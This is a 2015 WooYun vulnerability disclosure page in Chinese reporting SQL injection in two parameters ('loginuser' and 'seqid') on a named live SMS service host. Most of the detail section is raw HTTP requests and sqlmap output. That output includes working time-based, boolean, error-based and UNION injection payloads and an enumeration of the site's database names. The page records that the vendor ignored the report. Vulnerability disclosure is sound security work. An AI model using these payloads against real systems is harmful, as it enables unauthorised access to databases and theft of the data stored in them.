当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126717

漏洞标题:多打电话某系统SQL注入漏洞

相关厂商:iddsms.com

漏洞作者: 路人甲

提交时间:2015-07-14 16:09

修复时间:2015-07-19 16:10

公开时间:2015-07-19 16:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

第一处注入:

GET /user_findloginuser.jsp?loginuser=admin HTTP/1.1
Host: sms.iddsms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36
Accept: */*
Referer: http://sms.iddsms.com/fgpaswd.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460A


0.png


GET parameter 'loginuser' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 93 HTTP(s) requ
ests:
---
Parameter: loginuser (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: loginuser=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))RKKk) AND 'qx
iH'='qxiH
---
[14:49:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[14:49:52] [INFO] fetching database names
[14:49:52] [INFO] fetching number of databases
[14:49:52] [INFO] retrieved:
[14:49:52] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
2
[14:50:09] [INFO] retrieved:
[14:50:14] [INFO] adjusting time delay to 4 seconds due to good response times
[14:50:34] [ERROR] invalid character detected. retrying..
[14:50:34] [WARNING] increasing time delay to 5 seconds
[14:50:55] [ERROR] invalid character detected. retrying..
[14:50:55] [WARNING] increasing time delay to 6 seconds
information_schema
[14:59:32] [INFO] retrieved: w
[15:00:31] [ERROR] invalid character detected. retrying..
[15:00:31] [WARNING] increasing time delay to 7 seconds
ebsm
[15:03:08] [ERROR] invalid character detected. retrying..
[15:03:08] [WARNING] increasing time delay to 8 seconds
s
[15:04:35] [ERROR] invalid character detected. retrying..
[15:04:35] [WARNING] increasing time delay to 9 seconds
s
available databases [2]:
[*] information_schema
[*] websmss
[15:05:18] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\sms.iddsms.com'


第二处注入:

GET /manager/base/tailmt.jsp?seqid=1262236 HTTP/1.1
Host: sms.iddsms.com
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460A


1.png


sqlmap identified the following injection points with a total of 43 HTTP(s) requ
ests:
---
Parameter: seqid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: seqid=1262236' AND 9000=9000 AND 'zfLF'='zfLF
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: seqid=1262236' AND (SELECT 5252 FROM(SELECT COUNT(*),CONCAT(0x71627
17871,(SELECT (ELT(5252=5252,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATI
ON_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bYNj'='bYNj
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: seqid=1262236' AND (SELECT * FROM (SELECT(SLEEP(5)))WYNu) AND 'uALS
'='uALS
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: seqid=-2842' UNION ALL SELECT CONCAT(0x7162717871,0x4362637344627a5
2594b,0x71627a6271)--
---
[15:00:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[15:00:48] [INFO] fetching database names
[15:00:48] [INFO] the SQL query used returns 2 entries
[15:00:49] [INFO] retrieved: information_schema
[15:00:49] [INFO] retrieved: websmss
available databases [2]:
[*] information_schema
[*] websmss
[15:00:50] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\sms.iddsms.com'
[*] shutting down at 15:00:50


3.png


4.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-19 16:10

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论